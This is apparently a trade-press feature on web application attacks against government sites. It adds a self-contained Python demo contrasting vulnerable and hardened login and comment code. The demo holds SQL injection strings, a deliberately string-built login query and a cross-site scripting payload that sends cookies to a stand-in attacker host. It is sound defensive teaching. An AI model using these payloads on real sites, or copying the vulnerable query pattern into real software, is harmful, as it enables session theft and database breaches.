Weak spots in the fortress

Vulnerabilities in Web-based software put agencies and citizens at risk.

In what now seems like a more innocent era, attacks against computer networks a decade ago had names like smurf and teardrop. Hackers then typically targeted operating systems, Internet and e-mail servers, firewalls, and other vulnerable network components. Upstart hackers known as script kiddies were motivated by the challenge of taking down a network and earning a measure of notoriety.

Information technology security professionals responded by bolstering firewalls, reconfiguring and scanning networks, and stiffening perimeter defenses. The measures impeded the rash of computer worms that burrowed into networks and relied on unrestricted connectivity to spread.

“Most of the spending [on security] was at the network level,” said Mike Weider, chief technology officer at Watchfire, a Web application security company. “The mentality was on perimeter defense…to build the walls of the castle high.”

Realizing that hardened networks were increasingly difficult to breach using head-on attacks, hackers switched tactics. They turned their attention to finding application-level vulnerabilities. Bugs that reside in programs running on PCs and in Web-based applications are as insidious as termites in a wood-frame house. When exploited, they do their damage from the inside out.

“The Internet came along, and applications that were on the inside [of an organization], we put them outside” via the Web, Weider said. “Hackers discovered that you could exploit vulnerabilities in the software applications that were put outside the walls and…steal data, perform fraud, deface Web sites or cause other malicious acts.”

Today, application-level attacks outpace attacks on networks by 3-to-1, according to industry sources. Even as organizations have fortified network security, the threat from application vulnerabilities has expanded.

“This problem has been steadily growing over the last 10 years and has reached a feverish pitch,” Weider said.
“We’ve seen a huge shift in attack focus.”

The objective of hackers has also changed. “They are no longer just trying to get attention,” said James MacDougall, South Carolina’s chief information security officer. He said he has seen huge numbers of application-level attacks that seek to steal data or take over computers.

“What they want is personal identifiable information,” he said. “They want credit cards. They want to make money.”

In a recent attack that affected a nine-state area, including South Carolina, hijacked computers were used to create a botnet, a remotely controlled network of compromised machines that can be put to illegal uses such as generating spam on behalf of paying customers.

“It’s almost like a service-level agreement,” MacDougall said of the financial arrangements struck between illegal spammers and their clients.

As governments at the federal, state and local levels expand their Web presence, the vulnerability of public-sector IT will also grow, experts predict.

“The DMV and benefits departments and Medicare are starting to put more applications online,” said Brian Laing, chief security officer at RedSeal Systems, a provider of security risk management solutions.

Most organizations, including government agencies, have been slow to recognize and respond to the changing threat, security experts say. “Network security has been around for eight or nine years now,” said Mandeep Khera, vice president of marketing at Cenzic, which sells application security risk management products. “Most organizations have spent a lot of money on securing the network.”

That is no longer enough. You have to have network security and application security in place to keep up with current threats, Khera said. People charged with keeping systems and data safe “have to get over the fiction that network security will protect them from all threats. Application security is a different animal.”

Most common ploys

Russian hackers breached the security of a Web site managed by the state of Rhode Island in January 2006.
The thieves boasted in an online forum of having stolen credit card data for about 53,000 transactions, the Providence Journal newspaper reported. State officials did not divulge how the hackers were able to access the confidential data.

However, the hackers almost certainly used a strategy that is well-known to security pros. Cross-site scripting and SQL injection are two of the most prominent techniques for exploiting application-level vulnerabilities.

Cross-site scripting lets hackers inject script into Web pages viewed by other users, either by posting it where the site will display it, such as comments on a public discussion board, or by exploiting flaws in the way a site echoes data from visitors’ browsers back into its own pages. Because the injected script runs in the victim’s browser with the trust of the legitimate site, it can read session cookies or rewrite what the page shows.

Such ploys are often delivered by e-mail or instant messages in which the hackers masquerade as trustworthy online entities. The messages dupe victims into clicking links that lead to phony sites that look authentic, or to a legitimate site with the hacker’s script carried in the link itself, and thereby trick them into giving up sensitive personal or financial information.

SQL injection exploits vulnerabilities in the database layer of applications. Using nothing more than a Web browser, hackers look for gaps in software security that let them trick an application into retrieving and divulging information that shouldn’t be released from its database.

The vulnerability is often a poorly secured interface, such as a user log-in page. Instead of entering valid log-in information, such as a name and password, the hacker types a fragment of Structured Query Language, the language applications use to query relational databases, into the form field. If the application pastes that input directly into the text of its own query rather than passing it as a separate parameter, the fragment becomes part of the command the database executes.

On pages with poorly written code, a hacker “can craft stuff on those fields to have you give up all the secrets on your database,” MacDougall said. “I can go through and steal everything you’ve got.”

The practice has become so well-known that people can easily find software utilities that automate SQL injection attacks.
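
As an added illustration, not code from the article or from any of the vendors quoted in it, the following Python script builds a tiny in-memory SQLite database and a comment renderer and runs the two tricks described above against them: a log-in query assembled from user input beside the same query using bound parameters, and a discussion-board comment written into a page raw beside one that is HTML-escaped. The user names, passwords, table layout and attacker strings are all constructed for the demo.

```python
import html
import sqlite3

# Constructed demo data. Plain-text passwords only to keep the example short;
# a real application stores salted password hashes.
USERS = [("admin", "hunter2"), ("alice", "correct horse"), ("o'brien", "battery staple")]


def make_db() -> sqlite3.Connection:
    """Build an in-memory users table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The 'poorly secured log-in page': user input is pasted into the SQL text,
    so the input can change the query's structure, not just the values compared."""
    query = (
        "SELECT id FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: the SQL text is fixed and the input travels as bound parameters,
    so a quote or comment marker in the input is only ever compared as data."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


COMMENT_TEMPLATE = '<li class="comment">{body}</li>'


def render_comment_vulnerable(body: str) -> str:
    """Stored cross-site scripting: the comment goes into the page as-is, so a
    <script> tag one visitor posts runs in every other visitor's browser."""
    return COMMENT_TEMPLATE.format(body=body)


def render_comment_safe(body: str) -> str:
    """Hardened form: escape the HTML metacharacters (<, >, &, quotes) before the
    text reaches the page, so the browser shows the tag instead of running it."""
    return COMMENT_TEMPLATE.format(body=html.escape(body, quote=True))


# Constructed attacker inputs of the kind the article describes.
SQLI_COMMENT_TRICK = ("admin' --", "wrong password")   # '--' comments out the password check
SQLI_TAUTOLOGY = ("x' OR '1'='1", "x' OR '1'='1")        # always-true WHERE clause
XSS_PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'


def demo() -> dict:
    """Run both login paths and both renderers against the constructed inputs."""
    conn = make_db()
    results = {
        "vuln_comment_trick": login_vulnerable(conn, *SQLI_COMMENT_TRICK),
        "vuln_tautology": login_vulnerable(conn, *SQLI_TAUTOLOGY),
        "safe_comment_trick": login_safe(conn, *SQLI_COMMENT_TRICK),
        "safe_tautology": login_safe(conn, *SQLI_TAUTOLOGY),
        "safe_legit_user": login_safe(conn, "alice", "correct horse"),
        # A quote in a legitimate name is harmless once it is bound as a parameter.
        "safe_quote_in_name": login_safe(conn, "o'brien", "battery staple"),
        "xss_raw_has_script": "<script>" in render_comment_vulnerable(XSS_PAYLOAD),
        "xss_escaped_has_script": "<script>" in render_comment_safe(XSS_PAYLOAD),
    }
    try:
        results["vuln_quote_in_name"] = login_vulnerable(conn, "o'brien", "battery staple")
    except sqlite3.OperationalError:
        # The same apostrophe breaks the string-built query. This is the kind of
        # database error that leaks onto public pages and shows up in searches.
        results["vuln_quote_in_name"] = "sql error"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:24} {value}")
```

Running the script prints one line per check. The string-built login accepts `admin' --` and the always-true clause, while the bound-parameter version rejects both and still accepts the legitimate user whose name contains an apostrophe; the string-built query raises a database error on that same apostrophe. Stripping quote characters from input is not a fix: it would lock out o'brien and leave other injection forms open, which is why the hardened version changes how the query is built rather than filtering what goes into it.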
A simple Google search using “.gov” and common error messages that indicate software vulnerabilities will return thousands of hits, MacDougall said.

Added risks of custom software

The rapid expansion of government Web sites has increased the likelihood of hackers breaching security, experts say. Another cause for concern is the government’s preference for customized software, which tends to be much more vulnerable to attack than commercial applications. Microsoft and other large vendors of commercial applications routinely issue patches to fix known vulnerabilities. Users of customized applications are often on their own.

Custom-developed, Web-based applications tend to be several orders of magnitude less secure than commercially developed programs, said Gunter Ollmann, director of security strategy at IBM’s Internet Security Systems (ISS) division.

“When ISS’ professional services consulting team looks at upcoming commercial products, a typical report may identify 20 to 30 vulnerabilities, of which, on average, two to five would be high-risk or critical,” Ollmann said. “Looking at applications developed internally, which may be deployed on thousands of desktops or servers, the report is 20 or 30 pages long, with 100-plus high-risk security vulnerabilities.”

Web applications, whose components are often shared and reused so that a single flaw is replicated across many sites, are inherently more exposed to attack. In addition, the software developers who create custom Web applications tend not to put a premium on security.

“The two things we ask developers to do is cool functionality and get the application out the door on time,” said Michael Sutton, security evangelist at SPI Dynamics. “Those two things often work in opposition to security.”

Developers’ inattention to security also raises the possibility of programmers intentionally creating hidden vulnerabilities, including backdoors that allow unauthorized access to programs.

“There is so much [application development] outsourcing to India and China and other countries.
Anyone can put backdoors in there,” Khera said. “If you don’t do thorough testing for backdoors and other security testing, you have no idea what might be in there. You just don’t know what’s in the code.”
Pulley is a freelance writer based in Arlington, Va.

4 defenses against application attacks
Agencies can take steps to limit their vulnerability to application-level attacks. The first step is to ignore Britney Spears.
In April, hackers lured unsuspecting users to sites that exploited a vulnerability in .ani files, which Microsoft operating systems use to read and store animated cursors. Taking advantage of the vulnerability, the bogus sites ran hostile code on visitors’ computers, giving the hackers control of the machines.
The enticement? Spam e-mail messages promising nude photos of the troubled pop star.
You can never make yourself impervious to application-level attacks because many vulnerabilities have yet to be discovered. However, focusing on user education and technology solutions can lessen the chances of being victimized by such an attack.
As noted above, hackers often succeed in breaching security with the assistance of unwitting victims.
“Some of these attacks require the collaboration of users,” said Max Caceres, director of product management at Core Security Technologies. “In the Britney Spears attack, somebody needs to click on that” link.
Here are four ways to avoid application-level attacks:
  • Offer security awareness training. Teach employees to identify attacks and not fall for them, Caceres said. Core Impact, the company’s network security product, can test the likelihood that employees will be duped by hackers’ tricks, he said.
  • Remove unused applications. It is good policy to remove unnecessary applications from users’ machines, Caceres said. An attack that exploits a vulnerability in QuickTime, for example, is not a threat if you’re not running that application.
  • Patch high-risk software vulnerabilities. As a matter of course, security administrators should find and patch high-risk vulnerabilities in commercial applications. Scans and penetration tests can identify and determine the risk level of many of them. A word of caution: Software patches can be buggy, too. The Britney Spears attack exploited a flaw that an earlier patch for the same animated-cursor code had not fully closed.
  • Teach your developers to write secure code. Custom applications tend to have more vulnerabilities than commercial products. Microsoft won’t help you debug programs you’ve created in-house.
“If you create a vulnerability, you are totally on your own,” said Michael Sutton, security evangelist at SPI Dynamics, which focuses on Web application security. That company, along with Watchfire and others, is part of an emerging market built around identifying new vulnerabilities in custom Web applications, Caceres said.
The bottom line is that organizations are responsible for securing their systems and the data they hold, said James MacDougall, South Carolina’s chief information security officer. His staff developers undergo off-site training that teaches them to write secure code. MacDougall regularly visits with contract developers to ensure security, and he tests applications for security vulnerabilities well before they go into production.
“Even if an outside vendor does the application, we are the steward of the information,” MacDougall said. “It is our responsibility. If there is ever a lawsuit, South Carolina would be a co-litigant.”
— John L. Pulley